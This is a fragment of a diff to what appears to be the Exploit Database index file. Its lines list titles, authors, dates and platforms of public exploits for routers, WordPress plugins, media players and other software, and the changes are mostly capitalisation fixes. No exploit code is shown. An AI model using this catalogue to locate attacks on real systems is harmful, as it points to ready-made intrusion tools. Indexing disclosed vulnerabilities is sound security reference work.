+38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 +38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - (.mp3) Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0 -38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme - Multiple Security Vulnerabilities",2013-04-21,MustLive,php,webapps,0 +38487,platforms/php/webapps/38487.txt,"Wordpress Colormix Theme - Multiple Security Vulnerabilities",2013-04-21,MustLive,php,webapps,0 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08 / 1.00.09 - Path Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 38489,platforms/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload",2015-10-19,Metasploit,php,remote,0 38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 38493,platforms/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,dos,0 -38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin - Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 +38494,platforms/php/webapps/38494.txt,"Wordpress WP Super Cache Plugin - Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0 @@ -34786,17 +34786,17 @@ id,file,description,date,author,platform,type,port 38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 38509,platforms/php/webapps/38509.txt,"Securimage - 'example_form.php' Cross-Site Scripting",2013-05-10,"Gjoko Krstic",php,webapps,0 -38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 +38510,platforms/php/webapps/38510.txt,"Wordpress Securimage-WP Plugin - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 38511,platforms/php/webapps/38511.txt,"Gallery Server Pro - Arbitrary File Upload",2013-05-14,"Drew Calcott",php,webapps,0 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion to Remote Code Execution Exploit",2015-10-22,Scurippio,windows,remote,0 38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0 -38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 +38515,platforms/php/webapps/38515.txt,"Wordpress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 38516,platforms/php/webapps/38516.txt,"Open Flash Chart - 'get-data' Parameter Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 -38517,platforms/php/webapps/38517.html,"WordPress Mail On Update Plugin - Cross-Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 +38517,platforms/php/webapps/38517.html,"Wordpress Mail On Update Plugin - Cross-Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 38518,platforms/php/webapps/38518.txt,"Jojo CMS - 'search' Parameter Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38519,platforms/php/webapps/38519.txt,"Jojo CMS - 'X-Forwarded-For' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps,0 -38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 +38520,platforms/php/webapps/38520.html,"Wordpress WP Cleanfix Plugin - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 38521,platforms/multiple/remote/38521.c,"Python RRDtool Module - Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 38522,platforms/linux/remote/38522.txt,"Acme thttpd HTTP Server - Directory Traversal",2013-05-19,Metropolis,linux,remote,0 38523,platforms/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,php,webapps,0 @@ -34813,7 +34813,7 @@ id,file,description,date,author,platform,type,port 38538,platforms/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,multiple,dos,0 38644,platforms/windows/remote/38644.txt,"Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - Cross-Site Request Forgery",2015-11-06,hyp3rlinx,jsp,webapps,0 -38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 +38540,platforms/osx/local/38540.rb,"Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38541,platforms/php/remote/38541.rb,"Th3 MMA - mma.php Backdoor Arbitrary File Upload",2015-10-27,Metasploit,php,remote,80 38543,platforms/php/webapps/38543.txt,"php4dvd - 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix - Multiple Cross-Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 @@ -34839,7 +34839,7 @@ id,file,description,date,author,platform,type,port 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38567,platforms/php/webapps/38567.txt,"Max Forum - Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0 -38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme - 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 +38568,platforms/php/webapps/38568.txt,"Wordpress Ambience Theme - 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 38569,platforms/php/webapps/38569.txt,"Lokboard - 'index_4.php' PHP Code Injection",2013-06-10,"CWH Underground",php,webapps,0 38570,platforms/php/webapps/38570.txt,"ScriptCase - 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",php,webapps,0 38571,platforms/php/webapps/38571.txt,"mkCMS - 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",php,webapps,0 @@ -34855,13 +34855,13 @@ id,file,description,date,author,platform,type,port 38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 38583,platforms/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0 38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 -38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery Plugin - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",php,webapps,0 +38585,platforms/php/webapps/38585.pl,"Wordpress NextGEN Gallery Plugin - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",php,webapps,0 38586,platforms/android/remote/38586.txt,"TaxiMonger for Android - 'name' Parameter HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin - Security Bypass",2013-06-14,felipensp,multiple,remote,0 38588,platforms/php/webapps/38588.php,"bloofoxCMS - 'index.php' Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 38590,platforms/php/webapps/38590.txt,"et-chat - Privilege Escalation / Arbitrary File Upload",2013-06-18,MR.XpR,php,webapps,0 -38591,platforms/hardware/remote/38591.py,"TP-LINK TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0 +38591,platforms/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0 38592,platforms/php/webapps/38592.php,"Joomla! RokDownloads Component - Arbitrary File Upload",2013-06-19,Am!r,php,webapps,0 38593,platforms/cgi/webapps/38593.txt,"FtpLocate - HTML Injection",2013-06-24,Chako,cgi,webapps,0 38594,platforms/php/webapps/38594.txt,"Barnraiser Prairie - 'get_file.php' Directory Traversal",2013-06-25,prairie,php,webapps,0 @@ -34876,7 +34876,7 @@ id,file,description,date,author,platform,type,port 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0 38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 -38606,platforms/php/webapps/38606.txt,"WordPress WP Private Messages Plugin - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 +38606,platforms/php/webapps/38606.txt,"Wordpress WP Private Messages Plugin - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38609,platforms/windows/local/38609.py,"Gold MP4 Player - .swf Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0 @@ -34893,11 +34893,11 @@ id,file,description,date,author,platform,type,port 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 38630,platforms/php/webapps/38630.html,"phpVibe - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 -38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock Plugin - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38621,platforms/php/webapps/38621.txt,"Wordpress Xorbin Digital Flash Clock Plugin - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38622,platforms/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 -38624,platforms/php/webapps/38624.txt,"WordPress WP Feed Plugin - 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 -38625,platforms/php/webapps/38625.txt,"WordPress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38624,platforms/php/webapps/38624.txt,"Wordpress WP Feed Plugin - 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38625,platforms/php/webapps/38625.txt,"Wordpress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,multiple,dos,0 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 @@ -34912,9 +34912,9 @@ id,file,description,date,author,platform,type,port 38639,platforms/php/webapps/38639.txt,"miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 38640,platforms/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38641,platforms/multiple/webapps/38641.rb,"JSSE - SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0 -38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 +38643,platforms/php/webapps/38643.txt,"Wordpress Pie Register Plugin - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 -38648,platforms/php/webapps/38648.txt,"WordPress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 +38648,platforms/php/webapps/38648.txt,"Wordpress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0 38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0 38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps,0 @@ -34926,7 +34926,7 @@ id,file,description,date,author,platform,type,port 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Persistent Cross-Site Scripting",2015-11-09,Nu11By73,hardware,webapps,0 39374,platforms/osx/dos/39374.c,"OS X Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 -38660,platforms/php/remote/38660.rb,"WordPress Ajax Load More 2.8.1.1 Plugin - PHP Upload",2015-11-09,Metasploit,php,remote,0 +38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More 2.8.1.1 Plugin - PHP Upload",2015-11-09,Metasploit,php,remote,0 38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0 38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 @@ -34940,11 +34940,11 @@ id,file,description,date,author,platform,type,port 38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 38673,platforms/php/webapps/38673.txt,"Collabtive - Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0 -38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 +38674,platforms/php/webapps/38674.txt,"Wordpress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 38675,platforms/php/webapps/38675.html,"Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 -38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin - Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 -38677,platforms/php/webapps/38677.txt,"VBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 -38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 +38676,platforms/php/webapps/38676.txt,"Wordpress Duplicator Plugin - Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 +38677,platforms/php/webapps/38677.txt,"vBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 +38678,platforms/php/webapps/38678.txt,"Wordpress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module - Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 @@ -34957,7 +34957,7 @@ id,file,description,date,author,platform,type,port 38689,platforms/php/webapps/38689.txt,"SilverStripe - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server - Multiple SQL Injections",2013-08-07,"Yogesh Phadtare",cgi,webapps,0 38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 -38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 +38693,platforms/php/webapps/38693.txt,"Advanced GuestBook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 38694,platforms/windows/remote/38694.txt,"HTC Sync Manager - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0 38695,platforms/php/webapps/38695.txt,"CakePHP - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0 38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0 @@ -34971,8 +34971,8 @@ id,file,description,date,author,platform,type,port 38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - .lf5 SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow PoC",2015-11-16,"Nipun Jaswal",windows,dos,0 38706,platforms/multiple/webapps/38706.txt,"VLC Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",multiple,webapps,0 -38707,platforms/hardware/webapps/38707.txt,"D-link Wireless Router DIR-816L - Cross-Site Request Forgery",2015-11-16,"Bhadresh Patel",hardware,webapps,0 -38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - egghunter shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0 +38707,platforms/hardware/webapps/38707.txt,"D-Link Wireless Router DIR-816L - Cross-Site Request Forgery",2015-11-16,"Bhadresh Patel",hardware,webapps,0 +38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0 38709,platforms/php/webapps/38709.txt,"MCImageManager - Multiple Security Vulnerabilities",2013-07-16,MustLive,php,webapps,0 38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - (.pls; .m3u; .m3u8) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0 38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - (.asx) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0 @@ -35013,14 +35013,14 @@ id,file,description,date,author,platform,type,port 38747,platforms/windows/dos/38747.py,"Pwstore - Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos,0 38748,platforms/php/webapps/38748.txt,"dBlog CMS - 'm' Parameter SQL Injection",2013-09-03,ACC3SS,php,webapps,0 38749,platforms/asp/webapps/38749.txt,"Flo CMS - 'archivem' Parameter SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 -38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 +38750,platforms/php/webapps/38750.txt,"Wordpress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0 38752,platforms/windows/local/38752.c,"Watchguard Server Center - Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0 -38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 +38753,platforms/php/webapps/38753.html,"Wordpress Event Easy Calendar Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 38754,platforms/php/webapps/38754.txt,"eTransfer Lite - 'file name' Parameter HTML Injection",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0 -38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 -38756,platforms/php/webapps/38756.txt,"WordPress RokNewsPager Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0 -38757,platforms/php/webapps/38757.txt,"WordPress RokStories Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0 +38755,platforms/php/webapps/38755.txt,"Wordpress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 +38756,platforms/php/webapps/38756.txt,"Wordpress RokNewsPager Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0 +38757,platforms/php/webapps/38757.txt,"Wordpress RokStories Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0 38758,platforms/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0 @@ -35030,22 +35030,22 @@ id,file,description,date,author,platform,type,port 38764,platforms/hardware/remote/38764.rb,"F5 iControl - iCall::Script Root Command Execution",2015-11-19,Metasploit,hardware,remote,443 38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - Cross-Site Request Forgery",2015-11-19,"High-Tech Bridge SA",php,webapps,80 38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 -38767,platforms/php/webapps/38767.txt,"WordPress RokIntroScroller Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 -38768,platforms/php/webapps/38768.txt,"WordPress RokMicroNews Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 +38767,platforms/php/webapps/38767.txt,"Wordpress RokIntroScroller Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 +38768,platforms/php/webapps/38768.txt,"Wordpress RokMicroNews Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 38769,platforms/php/webapps/38769.txt,"Monstra CMS - 'login' Parameter SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 38770,platforms/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",php,webapps,0 38771,platforms/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0 38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injection",2013-10-02,"Yu-Chi Ding",php,webapps,0 38803,platforms/php/webapps/38803.txt,"WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",php,webapps,80 -38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 +38782,platforms/php/webapps/38782.php,"Wordpress SEO Watcher Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation",2015-11-20,Metasploit,linux,local,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 38780,platforms/php/webapps/38780.txt,"SilverStripe - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 -38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0 +38783,platforms/php/webapps/38783.php,"Wordpress Woopra Analytics Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0 38784,platforms/php/webapps/38784.txt,"AlienVault Open Source SIEM (OSSIM) - 'timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x - '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",php,webapps,0 38786,platforms/php/webapps/38786.txt,"Ziteman CMS - Login Page SQL Injection",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0 @@ -35054,7 +35054,7 @@ id,file,description,date,author,platform,type,port 38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos,0 38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza Espargham",php,webapps,80 38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash PoC",2015-11-23,"Antonio 